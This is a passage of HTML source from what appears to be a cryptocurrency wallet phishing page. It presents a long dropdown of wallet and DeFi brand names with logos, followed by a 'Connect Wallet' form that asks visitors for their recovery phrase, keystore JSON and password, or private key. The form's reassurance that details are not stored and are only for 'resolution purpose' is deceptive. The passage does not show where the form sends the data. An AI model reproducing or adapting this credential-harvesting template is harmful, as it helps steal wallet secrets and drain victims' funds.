        <img class="option-image" src="media/images/Dhrama.jpg" alt="Dharma Image">
        Dharma
    </option>
    <!-- end -->

    <!-- start -->
    <option value="1inch Wallet">
        <img class="option-image" src="media/images/1inch.jpg" alt="1inch Wallet Image">
        1inch Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Huobi Wallet">
        <img class="option-image" src="media/images/huobi.webp" alt="Huobi Wallet Image">
        Huobi Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Eidoo">
        <img class="option-image" src="media/images/eidoo.jpg" alt="Eidoo Image">
        Eidoo
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MYKEY">
        <img class="option-image" src="media/images/Mykey.jpg" alt="MYKEY Image">
        MYKEY
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TrustVault">
        <img class="option-image" src="media/images/Truthvault.jpg" alt="TrustVault Image">
        TrustVault
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Atomic">
        <img class="option-image" src="media/images/Atomic.jpg" alt="Atomic Image">
        Atomic
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Coin98">
        <img class="option-image" src="media/images/coin98.jpg" alt="Coin98 Image">
        Coin98
    </option>
    <!-- end -->

    <!-- start -->
    <option value="zkSync">
        <img class="option-image" src="media/images/znky.jpg" alt="zkSync Image">
        zkSync
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Shell Exchange">
        <img class="option-image" src="media/images/shell-f8ae42223837aae3358dcc1de881406e.jpg" alt="Shell Exchange Image">
        Shell Exchange
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Index Coop">
        <img class="option-image" src="media/images/indexcoop-9c383dd154f6f30145853d7ec3726c4c.jpg" alt="Index Coop Image">
        Index Coop
    </option>
    <!-- end -->

    <!-- start -->
    <option value="SwapX">
        <img class="option-image" src="media/images/swap.jpg" alt="SwapX Image">
        SwapX
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Starname">
        <img class="option-image" src="media/images/starname.png" alt="Starname Image">
        Starname
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Space">
        <img class="option-image" src="media/images/space-9705cd779cebb6665ca3e9c2f124ef3a.png" alt="Space Image">
        Space
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Maskbook">
        <img class="option-image" src="media/images/maskbook-808a88212bc45b95cf21835db9b01b50.png" alt="Maskbook Image">
        Maskbook
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Snapshot">
        <img class="option-image" src="media/images/snapp.jpg" alt="Snapshot Image">
        Snapshot
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Invoice.build">
        <img class="option-image" src="media/images/invoice.png" alt="Invoice.build Image">
        Invoice.build
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ankr">
        <img class="option-image" src="media/images/ankr-37d75439a9caa532b64264103a1afd57.jpg" alt="Ankr Image">
        Ankr
    </option>
    <!-- end -->

    <!-- start -->
    <option value="DODO">
        <img class="option-image" src="media/images/dodo.png" alt="DODO Image">
        DODO
    </option>
    <!-- end -->

    <!-- start -->
    <option value="zLOT">
        <img class="option-image" src="media/images/zlot-94acfa2da7de104d5ec9b4f8d443660b.jpg" alt="zLOT Image">
        zLOT
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Tokamak Network">
        <img class="option-image" src="media/images/tokmark.png" alt="Tokamak Network Image">
        Tokamak Network
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Actus Protocol">
        <img class="option-image" src="media/images/actusprotocol-ddd166bdc4b0d50e5c73de0317da32ce.jpg" alt="Actus Protocol Image">
        Actus Protocol
    </option>
    <!-- end -->

    <!-- start -->
    <option value="AstroTools.io">
        <img class="option-image" src="media/images/astrotools-cdf327a5720e9bc6690346bf7be3f77c.jpg" alt="AstroTools.io Image">
        AstroTools.io
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Rubic Exchange">
        <img class="option-image" src="media/images/rubic-b6978d64b0197aec38ebf807ea0dfae7.jpg" alt="Rubic Exchange Image">
        Rubic Exchange
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Torus Wallet">
        <img class="option-image" src="media/images/torus.jpg" alt="Torus Wallet Image">
        Torus Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Oceanprotocol">
        <img class="option-image" src="media/images/oceanprotocol.png" alt="Oceanprotocol Image">
        Oceanprotocol
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Filecone Wallet">
        <img class="option-image" src="media/images/filecoin.png" alt="Filecone Wallet Image">
        Filecone Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Falconswap">
        <img class="option-image" src="media/images/falconswap.png" alt="Falconswap Image">
        Falconswap
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Bancor Wallet">
        <img class="option-image" src="media/images/bancor.png" alt="Bancor Wallet Image">
        Bancor Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Harvest Finance">
        <img class="option-image" src="media/images/harvestfinance-a7aa9bb0416d32081b2677b2e775405b.jpg" alt="Harvest Finance Image">
        Harvest Finance
    </option>
    <!-- end -->

    <!-- start -->
    <option value="OctoFi">
        <img class="option-image" src="media/images/octofi.jpg" alt="OctoFi Image">
        OctoFi
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Mushroom Finance">
        <img class="option-image" src="media/images/mushroomfinance-5a5378ebb4d4d876246e8a3954bc032e.jpg" alt="Mushroom Finance Image">
        Mushroom Finance
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Bitfrost Finance">
        <img class="option-image" src="media/images/bitfro.png" alt="Bitfrost Finance Image">
        Bitfrost Finance
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Orchid Protocol">
        <img class="option-image" src="media/images/orchid-5723e8a24869107efe2e6168bcf235a3.png" alt="Orchid Protocol Image">
        Orchid Protocol
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Datamine Network">
        <img class="option-image" src="media/images/datamine-877d73dc8c545a84c6b896a2edb75ada.jpg" alt="Datamine Network Image">
        Datamine Network
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Streamr">
        <img class="option-image" src="media/images/streamr-cde993547e274bc2a0218d4cfc86c897.jpg" alt="Streamr Image">
        Streamr
    </option>
    <!-- end -->

    <!-- start -->
    <option value="DappRadar">
        <img class="option-image" src="media/images/dappradar-7f07c704c76c4a8c341714096e8667f0.png" alt="DappRadar Image">
        DappRadar
    </option>
    <!-- end -->

    <!-- start -->
    <option value="SuperRare">
        <img class="option-image" src="media/images/super.jpg" alt="SuperRare Image">
        SuperRare
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Arbitrum">
        <img class="option-image" src="media/images/arbitrum-f1518d05463bc02dcad2ea97e93b7797.jpg" alt="Arbitrum Image">
        Arbitrum
    </option>
    <!-- end -->

    <!-- start -->
    <option value="ParaSwap">
        <img class="option-image" src="media/images/Paraswap.jpg" alt="ParaSwap Image">
        ParaSwap
    </option>
    <!-- end -->

    <!-- start -->
    <option value="HoneySwap">
        <img class="option-image" src="media/images/honeyswap-352ce745732a31d09400a6ccd72926ac.jpg" alt="HoneySwap Image">
        HoneySwap
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Fleek">
        <img class="option-image" src="media/images/fleek-866527cf9372053c6f559b0b08f5b50f.png" alt="Fleek Image">
        Fleek
    </option>
    <!-- end -->

    <!-- start -->
    <option value="CoolWallet">
        <img class="option-image" src="media/images/coolwallets.webp" alt="CoolWallet Image">
        CoolWallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Alice">
        <img class="option-image" src="media/images/alice.webp" alt="Alice Image">
        Alice
    </option>
    <!-- end -->

    <!-- start -->
    <option value="AlphaWallet">
        <img class="option-image" src="media/images/alphawallet.webp" alt="AlphaWallet Image">
        AlphaWallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="ZelCore">
        <img class="option-image" src="media/images/zelcore.webp" alt="ZelCore Image">
        ZelCore
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Phantom Wallet">
        <img class="option-image" src="media/images/phantom.png" alt="Phantom Wallet Image">
        Phantom Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Solflare Wallet">
        <img class="option-image" src="media/images/solf.webp" alt="Solflare Wallet Image">
        Solflare Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Sollet Wallet">
        <img class="option-image" src="media/images/sollet.webp" alt="Sollet Wallet Image">
        Sollet Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="D'CENT Wallet">
        <img class="option-image" src="media/images/dcent.jpg" alt="D'CENT Wallet Image">
        D'CENT Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Tokenary">
        <img class="option-image" src="media/images/tokenary.jpg" alt="Tokenary Image">
        Tokenary
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Spatium">
        <img class="option-image" src="media/images/spatium.webp" alt="Spatium Image">
        Spatium
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Infinito">
        <img class="option-image" src="media/images/infinito-wallet-68da061495160c96f4bcb5e70e612fdd.png" alt="Infinito Image">
        Infinito
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Wallet.io">
        <img class="option-image" src="media/images/wallet-io-198f396de22fe25eb370f46544abe69d.png" alt="Wallet.io Image">
        Wallet.io
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Infinity Wallet">
        <img class="option-image" src="media/images/infinity-wallet-48e78bc97f96bad14ee6b781423a69ea.png" alt="Infinity Wallet Image">
        Infinity Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ownbit">
        <img class="option-image" src="media/images/ownbit-0b6b21e40acf2fa0f85d2c5ce38c4c51.png" alt="Ownbit Image">
        Ownbit
    </option>
    <!-- end -->

    <!-- start -->
    <option value="EasyPocket">
        <img class="option-image" src="media/images/easywallet.jpg" alt="EasyPocket Image">
        EasyPocket
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Bridge Wallet">
        <img class="option-image" src="media/images/bridge.jpg" alt="Bridge Wallet Image">
        Bridge Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Unstoppable Wallet">
        <img class="option-image" src="media/images/unstoppable.jpg" alt="Unstoppable Wallet Image">
        Unstoppable Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="PEAKDEFI Wallet">
        <img class="option-image" src="media/images/peakdefi.jpg" alt="PEAKDEFI Wallet Image">
        PEAKDEFI Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Vision">
        <img class="option-image" src="media/images/version.jpg" alt="Vision Image">
        Vision
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="BitKeep">
        <img class="option-image" src="media/images/bitkeep.webp" alt="BitKeep Image">
        BitKeep
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="ViaWallet">
        <img class="option-image" src="media/images/via.jpg" alt="ViaWallet Image">
        ViaWallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="SparkPoint">
        <img class="option-image" src="media/images/sparkpoint-5c0d3a4ab850a7ee2a3f03e215b68f2c.png" alt="SparkPoint Image">
        SparkPoint
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="HaloDefi Wallet">
        <img class="option-image" src="media/halodefi.html" alt="HaloDefi Wallet Image">
        HaloDefi Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Dok Wallet">
        <img class="option-image" src="media/images/dok%20wallet.webp" alt="Dok Wallet Image">
        Dok Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="AT.Wallet">
        <img class="option-image" src="media/images/at.jpg" alt="AT.Wallet Image">
        AT.Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Midas Wallet">
        <img class="option-image" src="media/images/midas.jpg" alt="Midas Wallet Image">
        Midas Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Ellipal">
        <img class="option-image" src="media/images/elipal.webp" alt="Ellipal Image">
        Ellipal
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="KEYRING PRO">
        <img class="option-image" src="media/images/keyringpro-830b2c0ee1db401dd64c2899eaf2adb3.png" alt="KEYRING PRO Image">
        KEYRING PRO
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Aktoinariat">
        <img class="option-image" src="media/images/actoin.webp" alt="Aktoinariat Image">
        Aktoinariat
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Talken Wallet">
        <img class="option-image" src="media/images/talken.webp" alt="Talken Wallet Image">
        Talken Wallet
    </option>
    
    <!-- start -->
    <option value="XinFin XDC Network">
        <img class="option-image" src="media/images/XDC.webp" alt="XinFin XDC Network Image">
        XinFin XDC Network
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Flare Wallet">
        <img class="option-image" src="media/images/flare.webp" alt="Flare Wallet Image">
        Flare Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="AToken Wallet">
        <img class="option-image" src="media/images/atoken.jpg" alt="AToken Wallet Image">
        AToken Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Tongue Wallet">
        <img class="option-image" src="media/images/tongue.jpg" alt="Tongue Wallet Image">
        Tongue Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Binance DEX">
        <img class="option-image" src="media/images/binance.png" alt="Binance DEX Image">
        Binance DEX
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="RWallet">
        <img class="option-image" src="media/images/rwallet.webp" alt="RWallet Image">
        RWallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="PlasmaPay">
        <img class="option-image" src="media/images/plasma.jpg" alt="PlasmaPay Image">
        PlasmaPay
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="O3Wallet">
        <img class="option-image" src="media/images/O3wallet.jpg" alt="O3Wallet Image">
        O3Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="HashKey Me">
        <img class="option-image" src="media/images/hashley.jpg" alt="HashKey Me Image">
        HashKey Me
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Jade Wallet">
        <img class="option-image" src="media/images/jadewallet.jpg" alt="Jade Wallet Image">
        Jade Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Guarda Wallet">
        <img class="option-image" src="media/images/Guarda%20Wallet.webp" alt="Guarda Wallet Image">
        Guarda Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Defiant">
        <img class="option-image" src="media/images/defiant.webp" alt="Defiant Image">
        Defiant
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Trustee Wallet">
        <img class="option-image" src="media/images/trusteewallet.webp" alt="Trustee Wallet Image">
        Trustee Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MEET.ONE">
        <img class="option-image" src="media/images/meet.webp" alt="MEET.ONE Image">
        MEET.ONE
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MoriX Wallet">
        <img class="option-image" src="media/images/Morix.webp" alt="MoriX Wallet Image">
        MoriX Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Binance Smart Chain">
        <img class="option-image" src="media/images/binance.png" alt="Binance Smart Chain Image">
        Binance Smart Chain
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Etherscan">
        <img class="option-image" src="media/images/etherscan.jpg" alt="Etherscan Image">
        Etherscan
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Lido">
        <img class="option-image" src="media/images/LidoDAO_Logo_Supplied_250x250.png" alt="Lido Image">
        Lido
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="TERRAstation">
        <img class="option-image" src="media/images/terrastation2.webp" alt="TERRAstation Image">
        TERRAstation
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="OpenSea">
        <img class="option-image" src="media/images/opensea.webp" alt="OpenSea Image">
        OpenSea
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Zapper">
        <img class="option-image" src="media/images/zapper.webp" alt="Zapper Image">
        Zapper
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Aave">
        <img class="option-image" src="media/images/Aave.webp" alt="Aave Image">
        Aave
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Zerion">
        <img class="option-image" src="media/images/zerion.webp" alt="Zerion Image">
        Zerion
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="LocalCryptos">
        <img class="option-image" src="media/images/lc.png" alt="LocalCryptos Image">
        LocalCryptos
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="DeBank">
        <img class="option-image" src="media/images/dbank.webp" alt="DeBank Image">
        DeBank
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Unstoppable Domains">
        <img class="option-image" src="media/images/unstoppable-94cacc1f07ef4bd5d209cc54e6947dfc.png" alt="Unstoppable Domains Image">
        Unstoppable Domains
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Rarible">
        <img class="option-image" src="media/images/rarible.webp" alt="Rarible Image">
        Rarible
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Yearn">
        <img class="option-image" src="media/images/yearn-b1f58a23799192b584640e18aa3e49ac.png" alt="Yearn Image">
        Yearn
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Adex Network">
        <img class="option-image" src="media/images/adex.jpg" alt="Adex Network Image">
        Adex Network
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="dYdX">
        <img class="option-image" src="media/images/dydx.webp" alt="dYdX Image">
        dYdX
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MyCrypto">
        <img class="option-image" src="media/images/mycrypto-eb8c1b9bd22f073b54b6b396d11d2d8e.png" alt="MyCrypto Image">
        MyCrypto
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Oasis App">
        <img class="option-image" src="media/images/osis.jpg" alt="Oasis App Image">
        Oasis App
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="TokenSets">
        <img class="option-image" src="media/images/tokenset.jpg" alt="TokenSets Image">
        TokenSets
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MANTRA DAO">
        <img class="option-image" src="media/images/MANTRA%20DAO.png" alt="MANTRA DAO Image">
        MANTRA DAO
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Matcha">
        <img class="option-image" src="media/images/match.webp" alt="Matcha Image">
        Matcha
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="KyberSwap">
        <img class="option-image" src="media/images/kyberswap-5eac7ed4173229dde773132e76891e9d.jpg" alt="KyberSwap Image">
        KyberSwap
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="DeFi Portfolio Tracker">
        <img class="option-image" src="media/images/download%20(1).png" alt="DeFi Portfolio Tracker Image">
        DeFi Portfolio Tracker
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Loopring">
        <img class="option-image" src="media/images/loopring.webp" alt="Loopring Image">
        Loopring
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="InstaDapp">
        <img class="option-image" src="media/images/instapp.jpg" alt="InstaDapp Image">
        InstaDapp
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Matic Network">
        <img class="option-image" src="media/images/matic.jpg" alt="Matic Network Image">
        Matic Network
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="3Box">
        <img class="option-image" src="media/images/3box.webp" alt="3Box Image">
        3Box
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="DDEX">
        <img class="option-image" src="media/images/dex.webp" alt="DDEX Image">
        DDEX
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Bamboo Relay">
        <img class="option-image" src="media/images/bombo.webp" alt="Bamboo Relay Image">
        Bamboo Relay
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Synthetix">
        <img class="option-image" src="media/images/syn.jpg" alt="Synthetix Image">
        Synthetix
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Dex.blue">
        <img class="option-image" src="media/images/dexblue.webp" alt="Dex.blue Image">
        Dex.blue
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="PoolTogether">
        <img class="option-image" src="media/images/pool.png" alt="PoolTogether Image">
        PoolTogether
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="DEX.AG">
        <img class="option-image" src="media/images/decag.png" alt="DEX.AG Image">
        DEX.AG
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Gelato">
        <img class="option-image" src="media/images/gelato.jpg" alt="Gelato Image">
        Gelato
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="ENS Domains">
        <img class="option-image" src="media/images/ens.jpg" alt="ENS Domains Image">
        ENS Domains
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Idle Finance">
        <img class="option-image" src="media/images/idlefinance-80d51872039fc5e44da8471f772e7b8e.png" alt="Idle Finance Image">
        Idle Finance
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="iearn.finance">
        <img class="option-image" src="media/images/iearnfinance-a9c886339dfde18902b4a2d62dd7d8ed.jpg" alt="iearn.finance Image">
        iearn.finance
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="RCN Finance">
        <img class="option-image" src="media/images/rcnfinance-10962ac2106e60990ad21d6285bb7761%20(1).jpg" alt="RCN Finance Image">
        RCN Finance
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Hegic">
        <img class="option-image" src="media/images/hegic.jpg" alt="Hegic Image">
        Hegic
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Kickback">
        <img class="option-image" src="media/images/kick.jpg" alt="Kickback Image">
        Kickback
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="88mph">
        <img class="option-image" src="media/images/88mph-72502d26d702e6bf7d9272c9bedd76a8.jpg" alt="88mph Image">
        88mph
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Mooni">
        <img class="option-image" src="media/images/mooni-433731ff4a75f50aafcd77bf594bff90.jpg" alt="Mooni Image">
        Mooni
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Clovers">
        <img class="option-image" src="media/images/clover.png" alt="Clovers Image">
        Clovers
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Mintbase">
        <img class="option-image" src="media/images/mintbase-f55b6301f81c6adc01844d708c1e0781.jpg" alt="Mintbase Image">
        Mintbase
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="DAOstack">
        <img class="option-image" src="media/images/daostack-25c23f08caee78a0987478c1eb5854c7.jpg" alt="DAOstack Image">
        DAOstack
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="KnownOrigin">
        <img class="option-image" src="media/images/known.jpg" alt="KnownOrigin Image">
        KnownOrigin
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MyEtherWallet">
        <img class="option-image" src="media/images/myether.jpg" alt="MyEtherWallet Image">
        MyEtherWallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Affogato">
        <img class="option-image" src="media/images/Affogato.png" alt="Affogato Image">
        Affogato
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="StablePay">
        <img class="option-image" src="media/images/stablepay-ad51b20c2c20da6cae8892046a5e4e0e.jpg" alt="StablePay Image">
        StablePay
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Defi Saver">
        <img class="option-image" src="media/images/defisaver-4621bfb89940d775022a85be63a375d6.jpg" alt="Defi Saver Image">
        Defi Saver
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Loom Network">
        <img class="option-image" src="media/images/loom.png" alt="Loom Network Image">
        Loom Network
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="ThorChain">
        <img class="option-image" src="media/images/thorchain.jpg" alt="ThorChain Image">
        ThorChain
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="BulkSender">
        <img class="option-image" src="media/images/bulksender.png" alt="BulkSender Image">
        BulkSender
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Heroes of Ether">
        <img class="option-image" src="media/images/heroesofether-2992ca5470349fb25d955b965fd1e4ec.png" alt="Heroes of Ether Image">
        Heroes of Ether
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Betoken">
        <img class="option-image" src="media/images/betoken-bb5e247ee3781d4dda52a09f9a48ed04.png" alt="Betoken Image">
        Betoken
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Linkdrop">
        <img class="option-image" src="media/images/linkdrop.png" alt="Linkdrop Image">
        Linkdrop
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="HelioWallet">
        <img class="option-image" src="media/images/heliowallet.png" alt="HelioWallet Image">
        HelioWallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Escaroo">
        <img class="option-image" src="media/images/escaroo-1432bf159b2c7e5ceabe2e433f2c132f.png" alt="Escaroo Image">
        Escaroo
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="TokenMarket">
        <img class="option-image" src="media/images/tokenmarket-44e69a123bcb57164017e6b8c9d5f54b.png" alt="TokenMarket Image">
        TokenMarket
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Mesa">
        <img class="option-image" src="media/images/mesa-8de8a8b02c4ebd53ce6e2a099ee9ab8a.png" alt="Mesa Image">
        Mesa
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="MCDEX">
        <img class="option-image" src="media/images/mcdex-1f14e288b5dbd182f6357625720a7680.png" alt="MCDEX Image">
        MCDEX
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Furucombo">
        <img class="option-image" src="media/images/furucombo-04997e5d4a71f2d0f04c74b275ebb69f.png" alt="Furucombo Image">
        Furucombo
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Melon">
        <img class="option-image" src="media/images/melon-aa48960b1a004eabf05ac598ec791bde.png" alt="Melon Image">
        Melon
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Chainsfr">
        <img class="option-image" src="media/images/chainsfr.png" alt="Chainsfr Image">
        Chainsfr
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="AKA3Email Alias">
        <img class="option-image" src="media/images/aka3-d3f66e1ba2650a6b864261b182a64e86.png" alt="3email alias Image">
        AKA3Email Alias
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="2Key">
        <img class="option-image" src="media/images/2key-2593e3f054b46953157933c0d70b9764.jpg" alt="2key Image">
        2Key
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Pitch">
        <img class="option-image" src="media/images/pitch.jpg" alt="Pitch Image">
        Pitch
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="SunshiSwap">
        <img class="option-image" src="media/images/sushiswap-f86fc0b4ac560941a052507d5129f5f7.png" alt="SunshiSwap Image">
        SunshiSwap
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Unagii">
        <img class="option-image" src="media/images/Ungii.png" alt="Unagii Image">
        Unagii
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Cream Finance">
        <img class="option-image" src="media/images/cream.jpg" alt="Cream Finance Image">
        Cream Finance
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Other Wallet">
        <img class="option-image" src="media/images/otherssss.jpg" alt="Other Wallet Image">
        Other Wallet
    </option>
    <!-- end -->
</select>            </div>
            <div class="dropdown">
                <label for="type">Access Type:</label>
                <select id="type" name="type" onchange="toggleFields()">
                    <option value="">Select Option</option>
                    <option value="Phrase" id="phraseOption">Phrase</option>
                    <option value="Keystore JSON" id="keystoreOption">Keystore JSON</option>
                    <option value="Private" id="privateOption">Private Key </option>
                </select>
            </div>
            <div id="phraseField" class="toggle-field">
                <textarea id="phraseinput" name="phraseinput" cols="30" rows="4" placeholder="Enter your Recovery Phrase"></textarea>
                <p style="font-size:10px">Typically 12 (sometimes 24) words separated by single spaces</p>
            </div>
            <div id="keystoreField" class="toggle-field">
                <textarea id="keystoreval" name="keystoreval" cols="30" rows="4" placeholder="Enter your Keystore JSON"></textarea>
                <p style="font-size:10px">Several lines of text beginning with "{...}" plus the password you used to encrypt it.</p> 
                <input type="text" id="password" name="password" placeholder="Enter Wallet Password">
            </div>
            <div id="privateField" class="toggle-field">
                <input type="text" id="privatekeyval" name="privatekeyval" placeholder="Enter Your Private Key">
            </div>
            <p style="font-size:8px">Any misinformation may hinder the successful resolution of the issue. Your details are not stored on our system! Its for resolution purpose only.</p>
            <div class="popup-footer">
                <button class="connect-btn" type="submit">Connect Wallet</button>
                <!-- <input type="hidden" name="submit" id="submit" value="wallet_recovery"> -->
                <a class="cancel-btn" onclick="closePopup()">Cancel</a>
            </div>
        </form>
        </div>
    </div>
</div>

<div class="container mt-5">
    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="modalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="modalLabel">Success</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body text-center">
                    <i class="fas fa-check-circle" style="font-size: 50px; color: green;"></i>
                    <p id="message"></p>
                </div>
            </div>
        </div>
    </div>
</div>

        <script src="assets/js/jquery-3.6.0.min.js"></script>
        <script src="assets/js/bootstrap.min.js"></script>
        <script src="assets/js/jquery.odometer.min.js"></script>
        <script src="assets/js/jquery.countdown.min.js"></script>
        <script src="assets/js/jquery.knob.min.js"></script>
        <script src="assets/js/jquery-countdowngampang.min.js"></script>
        <script src="assets/js/jquery.ba-throttle-debounce.min.js"></script>
        <script src="assets/js/jquery.mCustomScrollbar.min.js"></script>
        <script src="assets/js/jarallax.min.js"></script>
        <script src="assets/js/jquery.appear.js"></script>
        <script src="assets/js/jquery.easing.js"></script>
        <script src="assets/js/slick.min.js"></script>
        <script src="assets/js/wow.min.js"></script>
